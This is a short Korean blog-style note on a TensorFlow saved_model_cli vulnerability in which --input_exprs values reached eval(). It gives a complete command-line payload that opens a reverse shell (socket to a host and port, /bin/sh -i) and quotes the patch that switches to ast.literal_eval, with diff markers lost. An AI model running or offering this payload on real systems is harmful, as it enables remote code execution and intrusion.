Tensorflow CVE 를 보다가 신기한게 있었다.
바로 Tensorflow 내부에 존재하는 saved_model_cli 파일을 실행할 때 옵션을 다음과 같이 주면 리버스 쉘이 따진다는 것이다. ㅇㅅㅇ!
saved_model_cli run --input_exprs 'hello=exec("""\nimport socket\nimport subprocess\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("0.0.0.0",33419))\nsubprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())""")' --dir ./ --tag_set serve --signature_def serving_default
def preprocess_input_exprs_arg_string(input_exprs_str):
def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):
"""Parses input arg into dictionary that maps input key to python expression.
Parses input string in the format of 'input_key=<python expression>' into a
dictionary that maps each input_key to its python expression.
Args:
input_exprs_str: A string that specifies python expression for input keys.
Each input is separated by semicolon. For each input key:
Each input is separated by semicolon. For each input key:
'input_key=<python expression>'
safe: Whether to evaluate the python expression as literals or allow
arbitrary calls (e.g. numpy usage).
Returns:
A dictionary that maps input keys to their values.
@@ -545,8 +548,15 @@
def preprocess_input_exprs_arg_string(input_exprs_str):
raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
'"<input_key>=<python expression>"' % input_exprs_str)
input_key, expr = input_raw.split('=', 1)
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
if safe:
try:
input_dict[input_key] = ast.literal_eval(expr)
except:
raise RuntimeError(
f'Expression "{expr}" is not a valid python literal.')
else:
# ast.literal_eval does not work with numpy expressions
input_dict[input_key] = eval(expr) # pylint: disable=eval-used
return input_dict
